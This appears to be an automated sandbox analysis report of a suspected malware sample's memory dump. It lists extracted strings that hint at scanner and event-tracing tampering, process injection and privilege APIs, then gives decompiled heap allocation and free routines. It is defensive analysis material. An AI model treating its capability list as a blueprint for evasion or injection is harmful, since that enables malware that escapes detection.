ScanBuffer, xrefs: 0286CAAF, 0286CBD7, 0286D088, 0286D296, 0286D388, 0286D4F3, 0286D670, 0286D6E9, 0286D8E1, 0286DAA6, 0286DCA8, 0286DECA, 0286E0AE, 0286E13E, 0286E4D4, 0286E80C, 0286EAB3, 0286EC1E, 0286EE2E, 0286F032, 0286F250, 0286F512, 0286F626, 0286F83D, 0286FBAB, 0286FDE0, 02870175, 02870267, 02870A6B, 02870BFC, 02870D93, 028711B4, 02872A7C, 02872D2C, 02872E45, 02872F56, 02873071, 02873182, 02873274, 02873501, 0287386E, 02873B36, 02873E6D, 028747E7
endpointdlp, xrefs: 02873EF8, 02873F2B, 02873F5E, 02873F91
BCryptVerifySignature, xrefs: 02873D43
NtGetWriteWatch, xrefs: 0287446C
EnumProcessModules, xrefs: 0287411E
NtQueryDirectoryFile, xrefs: 028740C4
LdrLoadDll, xrefs: 02874637
EtwEventWrite, xrefs: 02874736
NtOpenFile, xrefs: 028746D0
DEEX, xrefs: 0286C966
bcrypt, xrefs: 02873D5A
DlpCheckIsCloudSyncApp, xrefs: 02873F14
NtWaitForSingleObject, xrefs: 02874013
URL=file:", xrefs: 028703F5
EnumServicesStatusExA, xrefs: 02874100
RtlQueryProcessDebugInformation, xrefs: 028740D3
C:\Windows\System32\, xrefs: 0286CCC1, 02872D06
ws2_32, xrefs: 0287417D
ScanString, xrefs: 0286C9ED, 0286CC5F, 0286CCE9, 0286CD77, 0286CF87, 0286DA05, 0286DB98, 0286DDAC, 0286E3C2, 0286E5DA, 0286E6F5, 0286EA15, 0286ED3C, 0286EF40, 0286F15E, 0286F3F6, 0286F74B, 0286F98F, 0286FC9D, 0286FED2, 02870083, 02870378, 028704E7, 0287059C, 02870F2F, 02871026, 02872B98, 02872C8A, 0287340F, 02873696, 0287376A, 028739FE, 02873CCF, 02874293
EnumServicesStatusW, xrefs: 028740F1
OpenProcess, xrefs: 028743A0
C:\Users\Public\, xrefs: 0286F8C0, 02870683
Initialize, xrefs: 0286CA4E, 0286CE95, 0286D00F, 0286D1A4, 0286D30F, 0286D57E, 0286DB1F, 0286DD33, 0286E035, 0286E67C, 0286E8A5, 0286EB2C, 0286ECC3, 0286EEC7, 0286F0E5, 0286F499, 0286FB32, 0286FE59, 028701EE, 02870B0A, 02870CA1, 02870E3D, 028710C2, 02873488, 02873ABD, 02873C56, 02873DF4, 0287476E
EnumServicesStatusExW, xrefs: 0287410F
VirtualAllocEx, xrefs: 0287433A
CreateProcessAsUserA, xrefs: 0287414B
Ntdll, xrefs: 028740AB, 028740BA, 028740C9, 028740D8
iexpress.exe, xrefs: 0286CDEA
MZP, xrefs: 0287395B
CreateProcessA, xrefs: 0287412D
NtAlertResumeThread, xrefs: 02873FAD
EtwEventWriteEx, xrefs: 02874703
LdrGetProcedureAddress, xrefs: 0287466A
NtOpenProcess, xrefs: 028748D3
C:\\Users\\Public\\Libraries\\, xrefs: 0286FD0B
GET, xrefs: 0286E437

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: File$AttributesCreateCurrentLibraryPathProcessVirtualWrite$AddressCloseCounterDirectoryFreeHandleInetLoadMemoryModuleNameName_OfflinePerformanceProcProtectQuery
String ID: .url$Advapi$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$DEEX$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GET$HotKey=$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$ScanBuffer$ScanString$SetUnhandledExceptionFilter$URL=file:"$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$bcrypt$can$connect$endpointdlp$http$iexpress.exe$kernel32$ntdll$psapi$tig$ws2_32
API String ID: 3306046263-2200116874
Opcode ID: 695106b2225a18d6e5b13b1532bf6416e6a41d0e1262edc4b7b9584e25bcefbf
Instruction ID: 7b0c228145328bf16159388f5d8bce589929b108d56a557eca88f99c63ebd87f
Opcode Fuzzy Hash: 695106b2225a18d6e5b13b1532bf6416e6a41d0e1262edc4b7b9584e25bcefbf
Instruction Fuzzy Hash: 4DB3323DA001698BEB10EB58DD80BDEB3FBAB85301F5085A29909E7314DE74EEC59F51

Uniqueness

Uniqueness Score: -1.00%

Function 02851724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E02851724(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t96;
				void** _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				void* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				void* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t129 =  *0x28a304d; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
							_t121 = _t96;
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E02851644();
								_t99 =  *0x28a57b0; // 0x7ebd0000
								 *_t147 = 0x28a57ac;
								 *0x28a57b0 = _t121;
								 *(_t147 + 4) = _t99;
								 *_t99 = _t121;
								 *0x28a57a8 = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x28a3718], ah");
								if(__eflags == 0) {
									goto L39;
								}
								Sleep(0);
								asm("lock cmpxchg [0x28a3718], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									continue;
								}
								goto L39;
							}
						}
						L39:
						_t141 = _t125 - 0xb30;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x28a3728 + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x28a3724;
							if((0xfffffffe << _t132 &  *0x28a3724) == 0) {
								_t133 =  *0x28a3720; // 0xea190
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E028515CC(_t125);
								} else {
									_t110 =  *0x28a371c; // 0x40ba1a0
									_t109 = _t110 - _t125;
									 *0x28a371c = _t109;
									 *0x28a3720 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x28a3718 = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L47;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L47:
							_push(_t152);
							_push(_t145);
							_t148 = 0x28a37a8 + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x28a3728 + _t142 * 4;
								 *_t80 =  *(0x28a3728 + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x28a3724], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E02851500(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							 *(_t159 - 4) = _t125 + 2;
							 *0x28a3718 = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					__eax =  *(__edx + 0x28a35c0) & 0x000000ff;
					__ebx = 0x2877040 + ( *(__edx + 0x28a35c0) & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									__eflags = __ebx;
									Sleep(0);
									__eax = 0x100;
									asm("lock cmpxchg [ebx], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 4);
					__eax =  *(__edx + 8);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x10);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0xc);
						if(__eax >  *(__ebx + 0xc)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x28a304d;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x28a3718], ah");
									if(__eflags == 0) {
										goto L20;
									}
									Sleep(0);
									__eax = 0x100;
									asm("lock cmpxchg [0x28a3718], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
									goto L20;
								}
							}
							L20:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x28a3724;
							__eflags =  *(__ebx + 1) &  *0x28a3724;
							if(( *(__ebx + 1) &  *0x28a3724) == 0) {
								__ecx =  *(__ebx + 0x18) & 0x0000ffff;
								__edi =  *0x28a3720; // 0xea190
								__eflags = __edi - ( *(__ebx + 0x18) & 0x0000ffff);
								if(__edi < ( *(__ebx + 0x18) & 0x0000ffff)) {
									__eax =  *(__ebx + 0x1a) & 0x0000ffff;
									__edi = __eax;
									__eax = E028515CC(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L33;
									} else {
										 *0x28a3718 = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x28a371c; // 0x40ba1a0
									__ecx =  *(__ebx + 0x1a) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x28a3720 =  *0x28a3720 - __edi;
									 *0x28a371c = __esi;
									goto L33;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x28a3728 + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x28a3728 + __eax * 4) + __eax * 8 * 4;
								__edi = 0x28a37a8 + ( *(0x28a3728 + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x28a3728 + __eax * 4;
									 *_t38 =  *(0x28a3728 + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x28a3724], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 0x1a) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E02851500(__eax, __ecx, __edx);
								}
								L33:
								_t56 = __edi + 6; // 0xea196
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x28a3718 = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 8)) = 0;
								 *((intOrPtr*)(__esi + 0xc)) = 1;
								 *(__ebx + 0x10) = __esi;
								_t61 = __esi + 0x20; // 0x40ba1c0
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 8) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0xc) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0xc;
							 *_t19 =  *(__edx + 0xc) + 1;
							__eflags =  *_t19;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0xc) =  *(__edx + 0xc) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 8) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 4);
							 *(__ecx + 0x14) = __ebx;
							 *(__ebx + 4) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}

0x02851730
0x02851736
0x02851968
0x0285196d
0x02851a80
0x02851a81
0x02851a83
0x02851684
0x02851688
0x02851694
0x028516a4
0x028516a9
0x028516ad
0x028516af
0x028516b1
0x028516b7
0x028516ba
0x028516bf
0x028516c4
0x028516ca
0x028516d0
0x028516d3
0x028516d5
0x028516dc
0x028516dc
0x028516e5
0x02851a89
0x02851a89
0x02851a8b
0x02851a8b
0x02851973
0x0285197f
0x02851982
0x02851984
0x02851938
0x0285193d
0x02851945
0x00000000
0x00000000
0x02851949
0x02851953
0x0285195b
0x0285195f
0x00000000
0x0285195f
0x00000000
0x0285195b
0x02851938
0x02851986
0x02851986
0x0285198e
0x02851991
0x0285199b
0x0285199b
0x028519a2
0x028519b5
0x028519b9
0x028519bf
0x028519d8
0x028519de
0x028519de
0x028519e0
0x028519fe
0x028519e2
0x028519e2
0x028519e7
0x028519e9
0x028519ee
0x028519f7
0x028519f7
0x02851a03
0x02851a0b
0x028519c1
0x028519c1
0x028519cb
0x028519d3
0x00000000
0x028519d3
0x028519a4
0x028519a7
0x028519aa
0x02851a0c
0x02851a0c
0x02851a0d
0x02851a0e
0x02851a15
0x02851a18
0x02851a1b
0x02851a1e
0x02851a20
0x02851a22
0x02851a29
0x02851a2b
0x02851a2b
0x02851a2b
0x02851a32
0x02851a34
0x02851a34
0x02851a32
0x02851a40
0x02851a45
0x02851a45
0x02851a47
0x02851a68
0x02851a68
0x02851a68
0x02851a49
0x02851a49
0x02851a4f
0x02851a52
0x02851a56
0x02851a5c
0x02851a5e
0x02851a5e
0x02851a5c
0x02851a70
0x02851a73
0x02851a7f
0x02851a7f
0x028519a2
0x0285173c
0x0285173c
0x0285173e
0x02851745
0x0285174c
0x028517a4
0x028517a4
0x028517a9
0x028517ad
0x00000000
0x00000000
0x028517af
0x028517af
0x028517b2
0x028517b7
0x028517bb
0x028517bd
0x028517bd
0x028517c0
0x028517c5
0x028517c9
0x028517cb
0x028517cb
0x028517d0
0x028517d5
0x028517da
0x028517de
0x028517e6
0x00000000
0x028517e6
0x028517de
0x028517c9
0x00000000
0x028517bb
0x028517a4
0x0285174e
0x0285174e
0x02851751
0x02851754
0x02851759
0x0285175b
0x02851774
0x02851777
0x0285177b
0x0285177d
0x02851780
0x028517f0
0x028517f1
0x028517f2
0x028517f9
0x028517fb
0x028517fb
0x02851800
0x02851808
0x00000000
0x00000000
0x0285180c
0x02851811
0x02851816
0x0285181e
0x02851822
0x00000000
0x02851822
0x00000000
0x0285181e
0x028517fb
0x0285182c
0x02851830
0x02851830
0x02851836
0x028518a8
0x028518ac
0x028518b2
0x028518b4
0x028518dc
0x028518e0
0x028518e2
0x028518e7
0x028518e9
0x028518eb
0x00000000
0x028518ed
0x028518ed
0x028518f2
0x028518f4
0x028518f5
0x028518f6
0x028518f7
0x028518f7
0x028518b6
0x028518b6
0x028518bc
0x028518c0
0x028518c6
0x028518c8
0x028518ca
0x028518ca
0x028518cc
0x028518ce
0x028518d4
0x00000000
0x028518d4
0x02851838
0x02851838
0x0285183b
0x02851842
0x02851849
0x0285184c
0x0285184f
0x02851856
0x02851859
0x0285185c
0x0285185f
0x02851861
0x02851863
0x02851865
0x0285186a
0x0285186c
0x0285186c
0x0285186c
0x02851873
0x02851875
0x02851875
0x02851873
0x0285187c
0x02851881
0x02851884
0x0285188a
0x028518f8
0x028518f8
0x028518f8
0x0285188c
0x0285188c
0x0285188e
0x02851892
0x02851894
0x02851897
0x0285189a
0x0285189d
0x028518a1
0x028518a1
0x028518fd
0x028518fd
0x028518fd
0x02851900
0x02851903
0x02851905
0x0285190a
0x0285190c
0x0285190f
0x02851916
0x02851919
0x02851919
0x0285191c
0x02851920
0x02851923
0x02851926
0x02851928
0x02851928
0x0285192a
0x0285192d
0x02851930
0x02851933
0x02851934
0x02851935
0x02851936
0x02851936
0x02851782
0x02851782
0x02851782
0x02851782
0x02851786
0x02851789
0x0285178c
0x0285178f
0x02851790
0x02851790
0x0285175d
0x0285175d
0x02851761
0x02851761
0x02851764
0x02851767
0x0285176a
0x02851794
0x02851797
0x0285179a
0x0285179d
0x028517a0
0x028517a1
0x0285176c
0x0285176c
0x0285176f
0x02851770
0x02851770
0x0285176a
0x0285175b

APIs

Sleep.KERNEL32(00000000), ref: 028517D0
Sleep.KERNEL32(0000000A,00000000), ref: 028517E6

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d496db75d5a48851c87e8cf58e9eadcbe6d5b423d3e4f9a177ddc599c8668f9b
Instruction ID: d4328409d1f0da23fdcab7317c1f516a1ea75ed2b445f1edafd941bd79890c18
Opcode Fuzzy Hash: d496db75d5a48851c87e8cf58e9eadcbe6d5b423d3e4f9a177ddc599c8668f9b
Instruction Fuzzy Hash: C4B104BEA002619BDB16CF6CD488365BBE1EB85315F1886BDD84DCB3C5DB709451CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02851A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E02851A8C(void* __eax, void* __edi) {
				signed int __ebx;
				void* _t50;
				signed int _t51;
				signed int _t52;
				signed int _t54;
				void _t57;
				int _t58;
				signed int _t65;
				void* _t67;
				signed int _t69;
				intOrPtr _t70;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				void* _t79;
				void* _t82;
				void _t85;
				void* _t87;
				void* _t89;

				_t48 = __eax;
				_t77 =  *(__eax - 4);
				_t65 =  *0x28a304d; // 0x0
				if((_t77 & 0x00000007) != 0) {
					__eflags = _t77 & 0x00000005;
					if((_t77 & 0x00000005) != 0) {
						_pop(_t65);
						__eflags = _t77 & 0x00000003;
						if((_t77 & 0x00000003) != 0) {
							return 0xffffffff;
						} else {
							_push(_t65);
							_t67 = __eax - 0x10;
							E02851644();
							_t50 = _t67;
							_t85 =  *_t50;
							_t82 =  *(_t50 + 4);
							_t51 = VirtualFree(_t67, 0, 0x8000); // executed
							if(_t51 == 0) {
								_t52 = _t51 | 0xffffffff;
								__eflags = _t52;
							} else {
								 *_t82 = _t85;
								 *(_t85 + 4) = _t82;
								_t52 = 0;
							}
							 *0x28a57a8 = 0;
							return _t52;
						}
					} else {
						goto L21;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L6;
							}
							Sleep(0);
							__edx = __edx;
							__ecx = __ecx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags != 0) {
								Sleep(0xa);
								__edx = __edx;
								__ecx = __ecx;
								continue;
							}
							goto L6;
						}
					}
					L6:
					_t6 = __edx + 0xc;
					 *_t6 =  *(__edx + 0xc) - 1;
					__eflags =  *_t6;
					__eax =  *(__edx + 8);
					if( *_t6 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L12:
							 *(__ebx + 0xc) = __eax;
						} else {
							__eax =  *(__edx + 0x14);
							__ecx =  *(__edx + 4);
							 *(__eax + 4) = __ecx;
							 *(__ecx + 0x14) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x10)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x10)) == __edx) {
								goto L12;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x28a304d; // 0x0
						L21:
						__eflags = _t65;
						_t69 = _t77 & 0xfffffff0;
						_push(_t84);
						_t87 = _t48;
						if(__eflags != 0) {
							while(1) {
								_t54 = 0x100;
								asm("lock cmpxchg [0x28a3718], ah");
								if(__eflags == 0) {
									goto L22;
								}
								Sleep(0);
								_t54 = 0x100;
								asm("lock cmpxchg [0x28a3718], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									continue;
								}
								goto L22;
							}
						}
						L22:
						__eflags = (_t87 - 4)[_t69] & 0x00000001;
						_t75 = (_t87 - 4)[_t69];
						if(((_t87 - 4)[_t69] & 0x00000001) != 0) {
							_t54 = _t69 + _t87;
							_t76 = _t75 & 0xfffffff0;
							_t69 = _t69 + _t76;
							__eflags = _t76 - 0xb30;
							if(_t76 >= 0xb30) {
								_t54 = E028514C0(_t54);
							}
						} else {
							_t76 = _t75 | 0x00000008;
							__eflags = _t76;
							(_t87 - 4)[_t69] = _t76;
						}
						__eflags =  *(_t87 - 4) & 0x00000008;
						if(( *(_t87 - 4) & 0x00000008) != 0) {
							_t76 =  *(_t87 - 8);
							_t87 = _t87 - _t76;
							_t69 = _t69 + _t76;
							__eflags = _t76 - 0xb30;
							if(_t76 >= 0xb30) {
								_t54 = E028514C0(_t87);
							}
						}
						__eflags = _t69 - 0x13fff0;
						if(_t69 == 0x13fff0) {
							__eflags =  *0x28a3720 - 0x13fff0;
							if( *0x28a3720 != 0x13fff0) {
								_t70 = _t87 + 0x13fff0;
								E02851560(_t54);
								 *((intOrPtr*)(_t70 - 4)) = 2;
								 *0x28a3720 = 0x13fff0;
								 *0x28a371c = _t70;
								 *0x28a3718 = 0;
								__eflags = 0;
								return 0;
							} else {
								_t89 = _t87 - 0x10;
								_t57 =  *_t89;
								_t79 =  *(_t89 + 4);
								 *(_t57 + 4) = _t79;
								 *_t79 = _t57;
								 *0x28a3718 = 0;
								_t58 = VirtualFree(_t89, 0, 0x8000);
								__eflags = _t58 - 1;
								asm("sbb eax, eax");
								return _t58;
							}
						} else {
							 *(_t87 - 4) = _t69 + 3;
							 *(_t87 - 8 + _t69) = _t69;
							E02851500(_t87, _t76, _t69);
							 *0x28a3718 = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 8) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 4);
							 *(__edx + 0x14) = __ebx;
							 *(__edx + 4) = __ecx;
							 *(__ecx + 0x14) = __edx;
							 *(__ebx + 4) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}

0x02851a8c
0x02851a8c
0x02851a95
0x02851a9b
0x02851b6c
0x02851b6f
0x02851c5c
0x02851c5d
0x02851c60
0x02851c6b
0x028516e8
0x028516e8
0x028516ed
0x028516f0
0x028516f5
0x028516f7
0x028516f9
0x02851704
0x0285170b
0x02851716
0x02851716
0x0285170d
0x0285170d
0x0285170f
0x02851712
0x02851712
0x02851719
0x02851723
0x02851723
0x00000000
0x00000000
0x00000000
0x02851aa1
0x02851aa1
0x02851aa3
0x02851aa5
0x02851b08
0x02851b08
0x02851b0d
0x02851b11
0x00000000
0x00000000
0x02851b17
0x02851b1c
0x02851b1d
0x02851b1e
0x02851b23
0x02851b27
0x02851b31
0x02851b36
0x02851b37
0x00000000
0x02851b37
0x00000000
0x02851b27
0x02851b08
0x02851aa7
0x02851aa7
0x02851aa7
0x02851aa7
0x02851aab
0x02851aae
0x02851adc
0x02851ade
0x02851af3
0x02851af3
0x02851ae0
0x02851ae0
0x02851ae3
0x02851ae6
0x02851ae9
0x02851aec
0x02851aee
0x02851af1
0x00000000
0x00000000
0x02851af1
0x02851af6
0x02851af8
0x02851afa
0x02851afd
0x02851b75
0x02851b78
0x02851b7a
0x02851b7c
0x02851b7d
0x02851b7f
0x02851b3c
0x02851b3c
0x02851b41
0x02851b49
0x00000000
0x00000000
0x02851b4d
0x02851b52
0x02851b57
0x02851b5f
0x02851b63
0x00000000
0x02851b63
0x00000000
0x02851b5f
0x02851b3c
0x02851b81
0x02851b81
0x02851b89
0x02851b8d
0x02851bc4
0x02851bc7
0x02851bca
0x02851bcc
0x02851bd2
0x02851bd4
0x02851bd4
0x02851b8f
0x02851b8f
0x02851b8f
0x02851b92
0x02851b92
0x02851b96
0x02851b9a
0x02851bdc
0x02851bdf
0x02851be1
0x02851be3
0x02851be9
0x02851bed
0x02851bed
0x02851be9
0x02851b9c
0x02851ba2
0x02851bf4
0x02851bfe
0x02851c2c
0x02851c32
0x02851c37
0x02851c3e
0x02851c48
0x02851c4e
0x02851c55
0x02851c59
0x02851c00
0x02851c00
0x02851c03
0x02851c05
0x02851c08
0x02851c0b
0x02851c0d
0x02851c1c
0x02851c21
0x02851c24
0x02851c28
0x02851c28
0x02851ba4
0x02851ba7
0x02851baa
0x02851bb2
0x02851bb7
0x02851bbe
0x02851bc2
0x02851bc2
0x02851ab0
0x02851ab0
0x02851ab2
0x02851ab8
0x02851abb
0x02851ac4
0x02851ac7
0x02851aca
0x02851acd
0x02851ad0
0x02851ad3
0x02851ad6
0x02851ad6
0x02851ad8
0x02851ad9
0x02851abd
0x02851abd
0x02851abd
0x02851abf
0x02851ac1
0x02851ac2
0x02851ac2
0x02851abb
0x02851aae

APIs

Sleep.KERNEL32(00000000,?,?,00000000,02851FE4), ref: 02851B17
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02851FE4), ref: 02851B31

